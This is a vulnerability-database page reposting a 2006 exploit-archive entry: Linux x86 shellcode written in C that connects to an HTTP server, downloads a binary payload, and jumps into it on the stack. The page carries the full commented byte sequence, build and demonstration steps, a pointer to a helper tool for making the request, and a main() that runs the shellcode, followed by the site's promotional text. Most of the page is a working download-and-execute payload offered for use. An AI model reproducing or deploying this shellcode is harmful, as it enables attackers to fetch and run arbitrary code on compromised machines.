Vulners
Lucene search
linux/x86 HTTP/1.x GET Downloads and JMP - 68 bytes+
/* (linux/x86) HTTP/1.x GET, Downloads and JMP - 68 bytes+
*
* This shellcode allows you to download a binary code straight off a standard HTTP server
* and execute it. The downloaded shellcode (e.g. binary code) will be executed on the stack.
*
* <DEMONSTRATION>:
*
* > Starting by creating a very simple shellcode, that will be downloaded and execute.
*
* root@magicbox:/tmp# cat foobar.s
* .section .text
* .global _start
* _start:
*
* movl $0x4, %eax
* movl $0x1, %ebx
*
* call _doint
* .ascii "Hello World!"
* .byte 0xa
* _doint:
* popl %ecx
* movl $0xd, %edx
* int $0x80
*
* movl $0x1, %eax
* int $0x80
*
* # Reverse CALL
* call _start
*
* > The only requirement from the downloaded shellcode, is that it will include a reverse
* CALL to itself. As this shellcode does not parse the HTTP header, it has no way to know
* where the downloaded shellcode begins or ends. Therefor it realys on the downloaded
* shellcode to supply that, by including a CALL in the bottom, which will be JMP into.
*
* > Compile the given shellcode
*
* root@magicbox:/tmp# as -o foobar.o foobar.s
* root@magicbox:/tmp# ld -o foobar foobar.o
*
* > Convert this file into a raw binary (headerless, formatless)
*
* root@magicbox:/tmp# objcopy -O binary foobar foobar.bin
*
* > Host this file, on some HTTP server (I haved used Apache/1.3.34)
*
* > Use gen_httpreq.c to generate a URL request (e.g. /foobar.bin)
*
* > Paste the gen_httpreq.c output, into this shellcode at the marked place.
*
* > Compile this shellcode w/ the gen_httpreq output in it.
*
* > Execute this shellcode
*
* root@magicbox:/tmp# gcc -o http-download-jmp http-download-jmp.c
* root@magicbox:/tmp# ./http-download-jmp
* Hello World!
* root@magicbox:/tmp#
*
* <LINKS/UTILITIES>:
*
* gen_httpreq.c, generates a HTTP GET request for this shellcode
* > http://www.tty64.org/shellcode/utilities/gen_httpreq.c
*
* - izik <[email protected]>
*/
char shellcode[] =
"\x6a\x66" // push $0x66
"\x58" // pop %eax
"\x99" // cltd
"\x6a\x01" // push $0x1
"\x5b" // pop %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x6a\x02" // push $0x2
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80
"\x5b" // pop %ebx
"\x5d" // pop %ebp
//
"\xbe\x80\xff\xff\xfe" // mov $0xfeffff80,%esi
// (0x0xfeffff80 = ~127.0.0.1)
//
//
"\x66\xbd\x91\x1f" // mov $0x1f91,%bp
// (0x1f91 = 8081/tcp)
//
//
// "\x66\xbd\xaf\xff" // mov $0xffaf, %bp
// // (0xafff = ~0080/tcp)
// "\x66\xf7\xd5" // not %bp
//
"\xf7\xd6" // not %esi
"\x56" // push %esi
"\x0f\xcd" // bswap %ebp
"\x09\xdd" // or %ebx,%ebp
"\x55" // push %ebp
"\x43" // inc %ebx
"\x6a\x10" // push $0x10
"\x51" // push %ecx
"\x50" // push %eax
"\xb0\x66" // mov $0x66,%al
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80
//
// <paste here the code, that gen_httpreq.c outputs!>
//
"\x89\xe1" // mov %esp,%ecx
"\xb0\x04" // mov $0x4,%al
"\xcd\x80" // int $0x80
//
// <_recv_http_request>:
//
"\xb0\x03" // mov $0x3,%al
"\x6a\x01" // push $0x1
"\x5a" // pop %edx
"\xcd\x80" // int $0x80
"\x41" // inc %ecx
"\x85\xc0" // test %eax,%eax
"\x75\xf4" // jne <_recv_http_request>
"\x83\xe9\x06" // sub $0x6,%ecx
"\xff\xe1"; // jmp *%ecx
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}
// milw0rm.com [2006-03-12]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Mar 2006 00:00Current
7.1High risk
Vulners AI Score7.1